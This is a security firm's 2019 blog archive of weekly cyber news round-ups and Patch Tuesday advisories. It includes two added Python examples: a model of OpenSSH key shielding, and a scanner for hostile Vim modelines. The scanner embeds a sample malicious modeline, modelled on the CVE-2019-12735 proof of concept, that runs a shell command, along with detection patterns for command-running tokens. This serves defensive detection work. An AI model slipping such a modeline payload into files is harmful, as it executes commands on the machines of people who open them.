Blog

Ironshare's latest posts ready to view and share.

News

Ironshare accepted as G-Cloud 11 supplier

We are delighted to announce that Ironshare has been awarded a place as a Crown Commercial Service listed supplier on the G-Cloud 11 framework. This follows our acceptance onto the DOS3 framework last year and now means that Ironshare software and consultancy services are available to view and purchase on the Government Digital Marketplace.

The Digital Marketplace is a hub of 24,000+ cloud technology and support specialists, which public sector organisations can use to browse, compare and select potential providers. It opens up the opportunity for our Cyber Security services and solutions to be found and selected by public sector organisations seeking reputable suppliers. What’s more, we’re proud to be part of an initiative that recognises the importance of connecting public sector organisations with credible and trusted services.

“In the last two years, we have established a strong client base predominantly in the SME and Corporate sector and now hope to continue that growth into the public sector. G-Cloud gives public sector organisations great access to reputable suppliers such as ourselves, and offers them the ability to evaluate and buy our cyber security solutions cost-effectively and with confidence.” – James Phipps, Ironshare

Our experience with a diverse range of clients has provided us with a unique insight into the challenges felt by organisations of all shapes and sizes, who all have one thing in common – they are seeking simple, clear and effective cyber security solutions. Tools alone can’t beat all the challenges that organisations face, but our efficient and cost-effective services bring strong layers of security to organisations of any size.

Recent research has revealed that phishing emails redirecting to fraudulent websites are perceived as posing the biggest cyber threat to UK business, with 59% of decision makers highlighting this as a chief security concern above everything else. Our Cisco Umbrella managed service provides an effective barrier to this threat, preventing users from accessing known bad external sites; having successfully rolled it out to many companies over the last 12 months, we have seen the positive impact and reassurance our service provides.

We are able to meet even the most complex public sector requirements and hope that joining the G-Cloud 11 framework reinforces our commitment to providing effective cyber security solutions to organisations throughout the UK.

About the Crown Commercial Service (CCS) and G-Cloud 11

The Crown Commercial Service (CCS) works with both departments and organisations across the whole of the public sector to ensure maximum value is extracted from every commercial relationship and to improve the quality of service delivery. The CCS goal is to become the ‘go-to’ place for expert commercial and procurement services. The G-Cloud 11 agreement supports the Government’s policy to centrally manage the procurement of common goods and services through an integrated commercial function at the heart of government.

By Stuart Hare on 13/7/19

Cyber Round-up

Cyber Round-up for 12th July

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

Security News

Cyber Essentials is Changing to Meet the Demands of the Future of Cyber Security

NCSC’s Cyber Essentials scheme is evolving to keep up with the ever-changing threats of cyber security; the aim is to ‘meet the cyber security challenges of today, and tomorrow’. NCSC plan to work with a single delivery partner who will take over running the scheme and change the certification by condensing the 5 accreditation bodies down into just one. These changes are designed to enhance the customer experience and help keep the scheme up to date in order to remain relevant. Cyber Essentials will improve through continuous collaboration with its new partner, to ensure the right changes are made to produce the best results. The new partner will take over the scheme at the end of March 2020, at which point we will begin to see these changes roll out.

By NCSC.gov.uk.

Firm Accidentally Deleted their G Suite Account and Attempted to Sue Google

Mosss, an interior design tools startup, accidentally deleted their G Suite account. The firm immediately contacted Google after the incident requesting that they restore their account; however, they have since mocked Google for providing no support. After a week of desperately trying to get a response on the status of their account, the firm received a one-line email from Google that simply said that their data was lost. The company was later advised to file a lawsuit to access their data and have since sued Google. Consumers of cloud-based services, such as G Suite or Office 365, should realise they are responsible for their own data, and ensure that offline backups of their data are completed on a regular basis.

By TheRegister.co.uk.

UK’s Biggest Forensic Services Forced to pay Ransom After Cyber-Attack

Eurofins Scientific, the UK’s biggest provider of forensic services, has been hit by what the firm described as a “highly sophisticated” ransomware attack. The ransomware hit just over a month ago, and as a result the British police have been forced to suspend work with the firm. The attack has disrupted work for both Eurofins and the police, since the company is responsible for more than half of the UK’s forensic science provision. The amount of money requested by the attackers was not disclosed to the BBC; however, it was confirmed that they paid it. Three weeks after the attack, Eurofins reported that operations were “returning to normal”.

By BBC.co.uk.

Threats & Breaches

British Airways Facing £183 Million GDPR Fine Following Data Breach

British Airways are facing a record fine after suffering a data breach last year; the breach involved personal information and payment card details being stolen from around 500,000 customers. The ICO has only announced a notice of intention for British Airways and has not yet issued the fine. The company has been allowed 28 days to appeal, and the ICO plan to listen to their representations before following through. The reason British Airways are facing such a big fine is the recently introduced General Data Protection Regulation, under which a firm can be fined up to 4% of its annual turnover. Despite this, the fine is equal to just 1.5% of British Airways’ turnover in 2017.

By TripWire.com.

Marriott Facing £99.2 Million Fine After Huge Data Breach

A recent data breach has exposed the personal information of around 383 million guests, including names, email addresses, phone numbers, dates of birth and all hotel reservation information. Millions of payment card and passport details were also compromised. The ICO intends to fine the Marriott International hotel group £99.3 million following the breach. It is suspected that approximately 7 million of the hacked records related to UK residents. Since the breach, Marriott has worked closely with the ICO investigation to improve its security, in order to mitigate the risk of another breach.

By HotForSecurity.Bitdefender.com.

Vulnerabilities & Updates

Webcam Hijack Flaw Forces Zoom to Release Emergency Patch (CVE-2019-13450)

A recent vulnerability discovered in Zoom, a video conferencing service, allows an attacker to take control of a user’s webcam through a malicious website. Over 4 million users are at risk from this flaw, which appears to only affect the collaboration client for Mac. This exploit can still affect those who have recently uninstalled Zoom, so it is advised that all users apply the necessary patches as soon as possible. The emergency patch completely removes the local web server and allows users to manually uninstall the app; a link to the patch is included in the original post. Zoom are due to release further updates that aim to resolve other issues around the safety of the service.

By Threatpost.com.

Apple Releases Patch for New iMessage Bug (CVE-2019-8664)

Attackers are exploiting a new high-severity flaw in Apple iMessage that allows them to essentially cause a denial of service on a target device. By sending a specially crafted message, the attacker can completely disable the victim’s device until it is reset to factory settings, wiping its data in the process. The vulnerability was discovered in April by a Google Project Zero researcher, who described the trigger as a “malformed message”. Apple recommend updating your device to minimise the risk of this attack; patches for the flaw were released on May 13, 2019 with the release of iOS 12.3.

By Threatpost.com.

And that’s it for this week’s round-up; please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #49 – 12th July 2019

By Joshua Hare on 11/7/19

Security Advisory Archives

Microsoft Patch Tuesday – July 19

The July Patch Tuesday security updates have been released by Microsoft today and they include a total of 77 vulnerabilities. 15 updates have been rated Critical and 62 Important, and 6 vulns have been publicly disclosed. Two of the listed vulns are already exploited in the wild.

MS products covered by these updates are Windows Operating Systems, DHCP, ASP.NET, Azure, GDI, the Microsoft Edge and Internet Explorer browsers, Office, .NET Framework, SQL Server, Visual Studio and MS Exchange Server.

CVE-2019-0785 is a critical memory corruption vulnerability (with a CVSS score of 9.8) in the Windows Server DHCP Service, affecting all Windows server operating systems from 2012 to 2019. If the server is configured in DHCP failover mode, an attacker can exploit this vuln by sending a crafted DHCP packet to the server. A successful exploit attempt will allow remote code execution or a possible DHCP Denial of Service due to an unresponsive service.

CVE-2019-1102 covers a critical remote code execution vulnerability in the Windows Graphics Device Interface (GDI+). Exploitation can be achieved by convincing a user to access a malicious website via an email attachment or link, or through file sharing services such as OneDrive or Box. Once successful, complete control of the affected system can be achieved, giving the attacker access to view, change or delete data, as well as create new accounts with privileged access.

CVE-2019-1113 is a critical vulnerability present in .Net framework v2.0 – v4.8. By sending a malicious file, that is opened by a user with an affected version of .Net, a bad actor can exploit this vuln and run remote code against the target. If the user is logged in with admin privileges the actor could gain complete control of the affected system.

CVE-2019-0880 relates to a local privilege escalation issue, rated Important, in the splwow64 component which is used to translate drivers for 32-bit applications. This affects both client and server versions of Windows and allows an attacker to gain privileged access to an affected system. Although this is a local vulnerability it is common to see this type of exploit bundled with other malware to increase privileges and the likelihood of successful attack. This vuln is currently being exploited in the wild.

CVE-2019-1132 is another Important-rated vuln that can result in privilege escalation due to memory handling issues. This exists in the Win32k component of older operating systems such as Windows 7 and Windows Server 2008. Exploiting this vuln can lead to arbitrary code being run in kernel mode, allowing malware installation, the creation of new admin accounts and the ability to both change and delete data. This is another vuln that is being exploited in the wild.

In addition, numerous critical vulns exist in Microsoft browsers (Edge and Internet Explorer) and their scripting engines. These vulns relate to memory corruption and handling issues that can result in remote code execution. They are largely exploited by convincing users to access malicious web content or to click links in emails or instant messages.

Please review this month’s updates and get patching as soon as you can!

Keeping up to date with security patches for your operating systems and software is a critical part of delivering and maintaining a strong security posture. Please ensure you test and update as quickly as possible to reduce risk, prevent exploitation and ultimately stay secure.

For a full list of this month’s updates please see the links below:

Patch Tuesday release notes: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/48293f19-d662-e911-a98e-000d3a33c573

Security update guide: https://portal.msrc.microsoft.com/en-us/security-guidance

By Stuart Hare on 9/7/19

Cyber Round-up

Cyber Round-up for 5th July

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

Security News

Microsoft are Making Multi-Factor Authentication Mandatory for Cloud Solution Providers

Following a recent security incident, Microsoft has announced the introduction of mandatory multi-factor authentication for Cloud Solution Providers. CSPs typically offer licences for a lower price than Microsoft does, as well as providing management services, making them appealing to most companies. For this reason, one company opted to partner with PCM Inc., the world’s sixth largest CSP, who managed the initial setup of Office 365 for them. One PCM employee retained full access to all the company’s files in Office 365 after the initial setup, without the security team realising. This employee, who was not using multi-factor authentication, was later hacked, leaving the Office 365 documents vulnerable. By forcing CSPs to use MFA, Microsoft hope to prevent these kinds of incidents from happening in the future.

By KrebsOnSecurity.com.

Former Equifax CIO Jailed for Insider Trading

Equifax suffered a massive data breach back in 2017 that allowed attackers to steal the names, addresses, social security numbers and dates of birth of over 150 million consumers. The Equifax IT team was aware of the vulnerability for around 5 months before the breach occurred but failed to patch it. The company kept the breach secret for 40 days before revealing it to the public. During this time, the man next in line to be global CIO of Equifax, Jun Ying, used the confidential information of the breach to sell his shares for almost US $1 million before the public learned of the incident. Ying was sentenced to four months in federal prison for insider trading and was fined accordingly.

By GrahamCluley.com.

Canadian Intelligence Agencies Warning of Potential Election Tampering

Warnings have been issued by the Canadian Communications Security Establishment regarding the upcoming elections. They believe that foreign actors have attempted to influence the country’s October election. The accusation was supported by the Canadian Security Intelligence Service (CSIS), who issued similar warnings. It was unclear in the reports which groups were attempting to tamper with the elections, but it was said that threat actors were seeking to influence the Canadian public ahead of the voting period.

By SCMagazine.com.

Threats

New ‘Text-to-Switch’ System Offers Easier Way to Switch UK Mobile Operators

The telecoms regulator, Ofcom, plans to introduce a new way to switch UK mobile operators; their new “text-to-switch” system does not require mobile users to speak with their existing provider, which makes the process much less painful. Instead, you text the word “PAC” to the number 65075; this responds with a code that can be used to switch providers. Despite this process being a much easier alternative to older methods, it opens up the possibility of a significant increase in fraud for mobile users. This new method will provide attackers with another easy route to SIM swapping, further threatening mobile and online account security, including compromising two-factor authentication services that rely on SMS text messages.

By ISPreview.co.uk.

Threats to ATM Security

It isn’t a secret that ATMs aren’t very secure, which makes them easy, profitable targets for attackers. We have recently seen a rise in new ATM attacks that are threatening users, and potentially their bank cards. One of these attacks is jackpotting, which involves making a hole to plug a laptop into the ATM; this can then be used to force money out of the machine. Thanks to the ATMs’ minimal encryption, this is extremely easy for attackers to pull off. Another attack that is on the rise is shimming. Shimming involves using a thin insert in the card reader, which can steal data from chip-enabled cards. The tech required makes this a more expensive attack, but the simplicity of it means anyone can do it. A common way to spot shimming is feeling for resistance in the card reader when inserting your card. Users are recommended to use tap and smartphone payments such as Apple Pay, to bypass the security issues of ATMs.

By SecurityWeek.com.

Vulnerabilities & Updates

New Complex Loader Allows Attackers to Avoid Antivirus Detection

Attackers have built a new complex loader that ensures antivirus systems do not detect their malicious payload. The loader uses the well-known technique “Heaven’s Gate”, a trick that allows 32-bit malware running on 64-bit systems to disguise API calls by switching to a 64-bit environment. In this instance, the loader was used in a new campaign to hide and deliver the popular malware HawkEye Reborn. This malware is never saved to the hard disk of the target machine; it is run in memory to evade detection by standard anti-virus products, and can be adapted to deploy other malware payloads. Advanced endpoint protection such as Cisco AMP for Endpoints can help in defending against this type of fileless malware. In-depth analysis of how this works is included in the original post by Talos Intelligence.

By TalosIntelligence.com.

Linux SACK Vulnerabilities Being Patched by VMware

The two vulnerabilities, SACK Panic (CVE-2019-11477) and SACK Excess Resource Usage (CVE-2019-11478), are affecting over 30 different products. The vulnerabilities exist because of a flaw in the Linux kernel implementation of TCP Selective Acknowledgement (SACK), which can be exploited by an attacker to execute a Denial of Service attack against any of the affected products. The flaw was originally discovered by Netflix researchers, who then disclosed it to the public. A list of all affected products is included in the original post, as well as any patches currently available. Keep in mind that VMware is still working on patching these vulnerabilities and has not yet released patches for all products.

By SCMagazine.com.

And that’s it for this week’s round-up; please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #48 – 5th July 2019

By Joshua Hare on 4/7/19

Cyber Round-up

Cyber Round-up for 28th June

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

Security News

Mobile Carriers Infiltrated by Hackers

Hackers have found a way to obtain complete control of mobile carrier networks after infiltrating over a dozen companies since 2012. The hackers have been using their access to steal sensitive data and monitor users, whilst also having the potential to do much more; they even have the ability to shut down communications if they wanted. Despite this, it is believed that the hackers care little about disruption and are more focused on espionage. The attack seems targeted, as only a small portion of the users they are monitoring have had data stolen (likely high-profile military and government figures).

It appears that the hackers exploited old vulnerabilities to infiltrate the carriers, and spread the malware by flooding all the computers on a network to achieve successful login attempts; this led to the creation of user accounts with escalated privileges, which they used to blend in as company staff. Researchers recommended that mobile carriers closely monitor high-privilege accounts and servers, however users can do nothing to protect themselves from being monitored.

By cnet.com.

Attacker Steals Data From NASA Using a Raspberry Pi

NASA recently revealed that 500 MB of data has been stolen from its Jet Propulsion Laboratory (JPL) by an attacker using a Raspberry Pi. The stolen files detail the transfer of military technology, as well as space technology related to the Mars Science Laboratory Mission. Auditors learned that users were able to access applications on JPL’s network that they should not have had access to, meaning the attacker could also gain similar access to the network. Since the system admins didn’t effectively monitor devices that were added to the network, the hacker went undiscovered for a very long time.

Upon discovery, NASA officials were worried that the attacker would be able to disrupt their mission systems and intercept messages, and so they disconnected the Johnson Space Center from the core Gateway. The Johnson Space Center is responsible for the ISS (International Space Station) program, which puts into perspective the scale of the breach. The hacker went 10 months before being discovered and was not the first person to target NASA. The massive amount of data regarding cutting-edge technology has made NASA a profitable target for malicious actors over the years.

By DigitalTrends.com.

Wipro Attackers Target Other Big Companies

The bad actors responsible for the Wipro phishing attack have been spotted targeting several other big companies, including Expedia, Rackspace and Western Union. The hacker group is also responsible for a large campaign of phishing attacks, intended to obtain cash from vulnerable businesses. The group was described as ‘reasonably sophisticated’, and it is believed that they used obscure phishing templates to carry out the attacks. The templates used in these attacks are identical to those marketed by the pentesting firm Lucy Security, although Lucy deny that their software products were used in the Wipro attack.

By TheRegister.com.

Threats

How Attackers Are Phishing Using Google Calendar

A new method of phishing has recently been discovered that attackers are taking advantage of. Commonly referred to as calendar phishing, attackers are making use of the default Google Calendar settings that allow invitations and events to be sent to users, even if that user hasn’t responded to the invite. The victims are typically caught off guard by calendar phishing, and are likely to dismiss the possibility of a link being malicious if it comes from a trusted Google app. This method of phishing, although effective, can be prevented very easily. Simply changing your event settings in Google Calendar to stop automatic invitations will resolve this issue; details on how to do this are included in the original post.

By FossBytes.com.

WeTransfer Sends File Transfer Emails to the Wrong People

A recent security failure has resulted in WeTransfer, a popular online file sharing service, sending file transfer links to the wrong recipients. This could potentially lead to unauthorised parties accessing sensitive files. Despite acknowledging the security incident, WeTransfer did not reveal how many users were affected or who the emails were sent to, and it is also unclear whether this was a malicious attack or a mistake made by the company. Users are recommended to encrypt sensitive files before using file sharing services, and to use a medium other than email when transferring files.

By GrahamCluley.com.

Vulnerabilities & Updates

Mozilla Patches Multiple Firefox Zero-Day Vulnerabilities

Last week, two zero-day flaws were discovered in Mozilla Firefox. The first involved manipulating JavaScript objects, whereas the second was a sandbox escape allowing access to the OS layer. Researchers discovered that the two flaws were intended to be used together to create a malicious backdoor known as Netwire, which can infect macOS and Linux systems. The Netwire relation was discovered by Apple security expert Patrick Wardle; however, it is not clear how the attackers learned that the flaws worked together. Despite this, both flaws were patched by Mozilla last week and fixes for both vulnerabilities are included in version 67.0.4 of Firefox.

By NakedSecurity.com.

Defending Against RAMBleed Using OpenSSH

Attacks such as RAMBleed allow an attacker to read bits in memory without directly accessing your memory space, due to a reliability issue in DRAM cells. RAMBleed attacks have their flaws, and only allow the attacker to make educated guesses as to where bits are stored; however, the authors of the RAMBleed paper managed to successfully read OpenSSH private keys from memory without root privileges. In response to the extraction of private keys, OpenSSH have released new code, which works by only keeping private keys in their usable, unencrypted form in memory for the short time they are required. OpenSSH’s aim is to reduce the time that keys are exposed to danger, thus making RAM-sniffing attacks much harder. The functions for the key-shielding code are included in the original post.

By NakedSecurity.com.
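The key-shielding approach summarised above, as an added illustration that is not OpenSSH’s code or the article’s: it mirrors the design (a large random prekey, hashed into an encryption key; only the ciphertext and the prekey held in memory; the key unshielded only around each operation) but substitutes a SHA-512 counter-mode keystream and HMAC-SHA256 for the AES-CTR and real signature OpenSSH uses, so it runs with Python’s standard library alone. The 16 KiB prekey size follows OpenSSH; the sample key bytes and the bit index are constructed. The last function models what a single-bit read error in a recovered prekey does to an attacker’s attempt to reconstruct the key.

```python
import hashlib
import hmac
import secrets

# OpenSSH shields a loaded private key with a large random "prekey" (16 KiB),
# hashes the prekey to derive a symmetric key, and keeps only the encrypted
# key plus the prekey in memory. The key is unshielded for the duration of one
# signing operation and then discarded again. This is a stdlib-only model of
# that design, not OpenSSH's implementation.
PREKEY_LEN = 16 * 1024


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """SHA-512 in counter mode: a stand-in for the AES-256-CTR OpenSSH uses,
    chosen so this illustration needs no third-party packages."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha512(enc_key + nonce + block.to_bytes(8, "big")).digest()
        block += 1
    return bytes(out[:length])


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class ShieldedKey:
    """Holds a private key encrypted under a key derived from a large prekey."""

    def __init__(self, private_key: bytes) -> None:
        self.prekey = secrets.token_bytes(PREKEY_LEN)
        self.nonce = secrets.token_bytes(16)
        self.ciphertext = _xor(private_key, self._stream(self.prekey, len(private_key)))

    def _stream(self, prekey: bytes, length: int) -> bytes:
        # Every bit of the prekey feeds the hash, so the derived key is only
        # correct if all 131072 prekey bits were read without error.
        enc_key = hashlib.sha512(prekey).digest()[:32]
        return _keystream(enc_key, self.nonce, length)

    def unshield(self) -> bytearray:
        return bytearray(_xor(self.ciphertext, self._stream(self.prekey, len(self.ciphertext))))


def sign(shielded: ShieldedKey, message: bytes) -> bytes:
    """Unshield only around the operation that needs the key. HMAC-SHA256
    stands in for a real signature algorithm."""
    key = shielded.unshield()
    try:
        return hmac.new(bytes(key), message, hashlib.sha256).digest()
    finally:
        # Best-effort scrubbing: Python cannot guarantee every copy is gone,
        # which is one reason OpenSSH does this in C with explicit zeroing.
        for i in range(len(key)):
            key[i] = 0


def recover_with_bit_error(shielded: ShieldedKey, bit_index: int) -> bytes:
    """Model a RAMBleed-style read of the prekey that gets one bit wrong, then
    run the same derivation the legitimate owner performs."""
    leaked = bytearray(shielded.prekey)
    leaked[bit_index // 8] ^= 1 << (bit_index % 8)
    return _xor(shielded.ciphertext, shielded._stream(bytes(leaked), len(shielded.ciphertext)))


# Constructed sample key material for the demonstration; not a real key.
SAMPLE_PRIVATE_KEY = b"-----BEGIN CONSTRUCTED TEST KEY-----" + bytes(range(64))


def demo() -> dict:
    shielded = ShieldedKey(SAMPLE_PRIVATE_KEY)
    direct = hmac.new(SAMPLE_PRIVATE_KEY, b"hello", hashlib.sha256).digest()
    return {
        "round_trip_ok": bytes(shielded.unshield()) == SAMPLE_PRIVATE_KEY,
        "signature_matches_direct_hmac": sign(shielded, b"hello") == direct,
        "one_bit_error_recovers_key": recover_with_bit_error(shielded, 12345) == SAMPLE_PRIVATE_KEY,
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows a clean round trip and a matching signature, while the recovery from a prekey with one wrong bit yields garbage: an attacker has to read every one of the prekey bits correctly, which is what turns a probabilistic bit-read such as RAMBleed’s into a much harder problem than reading a bare key.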

And that’s it for this week’s round-up; please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #47 – 28th June 2019

By Joshua Hare on 27/6/19

Cyber Round-up

Cyber Round-up for 21st June

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

Security News

U.S. Electric Companies Targeted by TRISIS

XENOTIME, the Advanced Persistent Threat group behind the TRISIS Industrial Control System (ICS) malware, which originally targeted the oil and gas industries, has recently been expanding its focus to target electric companies. The Russian-linked XENOTIME group has been spotted exploring the networks of U.S. electric organisations, indicating a potential attack on critical infrastructure. It is believed that an attack of this nature could also result in loss of life and major physical damage, making it extremely dangerous. Governments and companies are recommended to work cooperatively to defend critical infrastructure, and the lives of the workers, from such devastating cyber attacks.

By ThreatPost.com.

Airplane Manufacturer ASCO hit by Ransomware Attack

ASCO, one of the world’s largest airplane manufacturers, has been hit by a ransomware attack. After ASCO’s plant in Zaventem, Belgium, was severely impacted by the infection, it was forced to shut down production in its U.S., Canada and Germany based factories. About 70% of the Belgian plant’s workers have been given leave for a week until the issue is resolved. ASCO have not revealed if the ransom has been paid, but it is evident that the damage caused by the attack is severe. It is never recommended to pay the ransom; always ensure that you have offline backups available to restore systems and services in the event of an attack.

By ThreatPost.com.

Threats

Cyberespionage Campaign Targeting Middle East

A mobile cyberespionage campaign, named “Bouncing Golf”, has been discovered targeting Middle Eastern countries. The malware involved in the campaign has been identified as AndroidOS_GolfSpy.HRX and possesses a large number of cyberespionage capabilities. The attack works by embedding malicious code in applications that bad actors have repackaged from legitimate apps. The capabilities of this malware give it the potential to completely hijack an infected Android mobile device, from which hackers can effectively steal device accounts, device locations, stored files and messages. Although the number of devices impacted so far is small, military info was included in the stolen data. Users are recommended to keep their devices up to date with the latest software and install mobile endpoint security (such as Cisco AMP for Endpoints), to help protect their devices against these types of exploits and rogue applications.

By TrendMicro.com.

Firefox 0-Day Vulnerability Allows Complete Device Takeover

A new critical vulnerability in Firefox and Firefox ESR allows attackers to completely take over any device affected by the exploit. Due to a flaw in the Array.pop method, the attacker can manipulate JavaScript objects, resulting in an exploitable crash that allows control over an affected system. Anyone using Mozilla Firefox is vulnerable to an attack of this nature. Patches have now been released for this vulnerability, available in Firefox 67.0.3 and Firefox ESR 60.7.1. As this vuln is being actively exploited in the wild, Mozilla recommends that users update their systems immediately.

By SCMagazine.com.

Vulnerabilities & Updates

Cryptocurrency Mining Botnet Uses ADB to Spread Through SSH

A new cryptocurrency mining botnet has been discovered that exploits poor default settings, including a lack of authentication on open ADB (Android Debug Bridge) ports. The botnet has the potential to spread to any system that has previously established an SSH connection with the infected host. This vulnerability is present in all Android-based devices, and the botnet has been seen operating in 21 different countries. Users are advised to update their devices immediately and always change any default authentication settings to ensure devices are secure.

By TrendMicro.com.

Linux Worm Capable of Leveraging a Critical RCE Vulnerability (CVE-2019-10149)

MSRC (Microsoft Security Response Center) recently confirmed the existence of an active Linux worm that could potentially take advantage of a critical Remote Code Execution vulnerability in Linux Exim email servers. Only customers using Exim versions 4.87 to 4.91 are affected, and it was confirmed that the vulnerability does not exist in Microsoft Azure infrastructure and services. Microsoft recommends that any customers running a vulnerable version of Exim should update to the latest fixed version as soon as possible.

By Microsoft.com.

And that’s it for this week’s round-up; please don’t forget to tune in for our next instalment.

Why not follow us on social media using the links provided on the right.

Edition #46 – 21st June 2019

By Joshua Hare on 20/6/19

Cyber Round-up

Cyber Round-up for 14th June

Welcome to the Ironshare Cyber Round-up, where we look back at the events of the last week and cover some of the news, posts, views and highlights from the world of Security.

In this week’s round-up:

Security News

MI5’s Unlawful Use of Personal Data

MI5 have been holding on to people’s personal data illegally for many years and have been keeping it a secret. Under the Investigatory Powers Act, MI5 can apply for a warrant to obtain people’s personal data for important investigations such as counter-terrorism. The act also states that data should only be kept for as long as it is relevant to an investigation; despite this, MI5 have reportedly held onto this information unlawfully for much longer than required. The Investigatory Powers Commissioner also announced that the retained information had not been stored safely either. It was revealed that senior members of MI5 have been aware of the security issues since 2016, and have kept it secret from the public, the Home Office and the Prime Minister.

By BBC.co.uk.

Spammers Have Found New Ways to Bypass Gmail Filters

Spammers have found a way to beat Gmail’s spam filters by taking advantage of the ‘preferential treatment’ Google gives its own applications. Notifications generated by other Google apps, such as Google Calendar and Photos, get a free pass through the Gmail filters, so any spam embedded in one of these messages is allowed through as well. For example, a scammer can deliver a malicious link to a user via the description of a Google Calendar invite. Similar bypass methods have been observed in Google Forms, Drive, Photos and even Google Analytics. A Google spokesperson said the company is constantly working to combat spam and, while it is making progress, not all spam will be blocked.

By TheRegister.co.uk.

Threats

Linux Vulnerability in Vim and Neovim (CVE-2019-12735)

A high-severity vulnerability (CVE-2019-12735) has been discovered in the popular command-line text editors Vim and Neovim. It allows an attacker to execute arbitrary commands on a Linux system simply by getting a user to open a crafted file in either editor. Both editors support ‘modelines’, a feature that lets a file set editor options through a specially formatted comment in its first or last few lines. Options whose values are expressions are meant to be evaluated inside a sandbox, but that sandbox could be escaped using the “:source!” command. Fixes have been released in Vim 8.1.1365 and Neovim 0.3.6; install them as soon as possible, or disable the feature with ‘set nomodeline’ in your vimrc. Additional recommendations are listed in the original post.

By TheHackerNews.com.
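Below is an added example, written for this round-up and not taken from the original post or from the Vim or Neovim projects, of how a practitioner might triage files for hostile modelines. It applies Vim’s own rule of only reading the first and last five lines, extracts the option text, and flags any modeline that carries a “:source!” (including the backslash-escaped “source\!” form), a shell escape or a code-running function call. The sample inputs, including the malicious one modelled on the shape of the public proof of concept, are constructed for this example. The scanner is a detection aid only; the fix is the vendor patch, or ‘set nomodeline’.

```python
import re
from typing import Dict, List

# Vim only honours modelines in the first and last 'modelines' lines (default 5).
MODELINES_WINDOW = 5

# The two modeline forms (see :help modeline); group 1 is the option text.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(.*)$")

# Options whose value is a Vim expression. Their evaluation is supposed to be
# sandboxed; the reported bypass smuggled ':source!' into such a value.
EXPR_OPTION_RE = re.compile(
    r"\b(foldexpr|fde|formatexpr|fex|includeexpr|inex|indentexpr|inde|"
    r"foldtext|fdt|statusline|stl)="
)

# Tokens that have no business in a modeline: ':source!' (also spelt 'so!',
# the '!' possibly backslash-escaped), a shell escape, or a code-running call.
DANGEROUS_RE = re.compile(r"\bso(?:urce)?\\?!|:!|\b(?:system|execute|feedkeys)\(")


def candidate_lines(text: str, window: int = MODELINES_WINDOW) -> List[str]:
    """The lines Vim would actually inspect for a modeline."""
    lines = text.splitlines()
    if len(lines) <= 2 * window:
        return lines
    return lines[:window] + lines[-window:]


def scan_text(text: str) -> List[Dict]:
    """One finding per modeline Vim would parse. 'dangerous' marks modelines
    whose option text carries a source!/shell-escape/code-call token."""
    findings = []
    for line in candidate_lines(text):
        m = MODELINE_RE.search(line)
        if not m:
            continue
        options = m.group(1)
        findings.append({
            "line": line,
            "options": options,
            "expr_options": EXPR_OPTION_RE.findall(options),
            "dangerous": DANGEROUS_RE.search(options) is not None,
        })
    return findings


# Constructed samples (not real files from the wild).
BENIGN = "#!/usr/bin/env python3\n# vim: set ts=4 sw=4 et:\nprint('hello')\n"

# Shaped like the public proof of concept: the command hides inside the
# fold-expression option and is reached via an escaped ':source!'.
MALICIOUS = r':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="'

# Same payload buried on line 10 of a 20-line file: outside Vim's window,
# so Vim would not evaluate it and the scanner must not report it either.
HIDDEN_TOO_DEEP = "\n".join(
    [f"line {i}" for i in range(1, 10)] + [MALICIOUS] + [f"line {i}" for i in range(11, 21)]
)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for finding in scan_text(fh.read()):
                flag = "DANGEROUS" if finding["dangerous"] else "ok"
                print(f"{path}: [{flag}] {finding['line']}")
```

Run it as `python3 scan_modelines.py *.txt` over a directory of files received from outside; any “DANGEROUS” line is worth opening in an editor with modelines disabled rather than your usual one.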

Executing Attacks Using Email

Email is the primary form of communication among businesses, which is why it is still the preferred delivery method for most attackers. In 2018, many of the top critical threats used email to execute attacks. For example, Emotet delivered malware by attaching malicious documents to emails disguised as invoices or payment-related spam. Despite evolving into a much more advanced platform, Emotet still uses email as its preferred method of launching attacks. Other critical threats, such as cryptomining, also use email to deliver malicious payloads. A newly emerging threat, unauthorised MDM (Mobile Device Management) profiles, also uses email to trick the user into installing a malicious profile onto their device. The popularity of email attacks means they won’t be going anywhere, so stay vigilant.

By SecurityWeek.com.

Vulnerabilities & Updates

Microsoft Patch Tuesday – June 19

The months are rolling round fast, meaning it’s update time again. The June Patch Tuesday security updates address a total of 88 vulnerabilities: 17 have been rated Critical and 65 Important. Four have been publicly disclosed, but none have been detected as already exploited in the wild.

By Ironshare.

Windows 10 Privilege Escalation Exploit (CVE-2019-0841)

Microsoft released an update in the April 2019 Patch Tuesday for an Important Windows 10 privilege escalation bug (CVE-2019-0841); however, this week a second bypass for that patch was published on GitHub by the researcher known as SandboxEscaper. The flaw allows a low-privileged attacker to gain control of files they would not normally have access to. Microsoft did not have enough time to address the bypass before the June Patch Tuesday, so there is currently no patch for it.

By ZDNet.com.

High-Severity Cisco Flaw Gives Attackers Control of Devices (CVE-2019-1904)

A new vulnerability has been discovered in IOS XE, the Linux-based version of Cisco’s Internetwork Operating System. The flaw allows a remote attacker to take full control of routers or switches through the web-based management UI. Because the web UI has no CSRF (Cross-Site Request Forgery) protection, an attacker can trick an authenticated user into following a malicious link, which makes the user’s browser submit a request that performs an unwanted action using the user’s existing session on the device. The vulnerability was given a CVSS score of 8.8 out of 10. There are currently no workarounds for the flaw, but Cisco has released a software patch.

By threatpost.com.
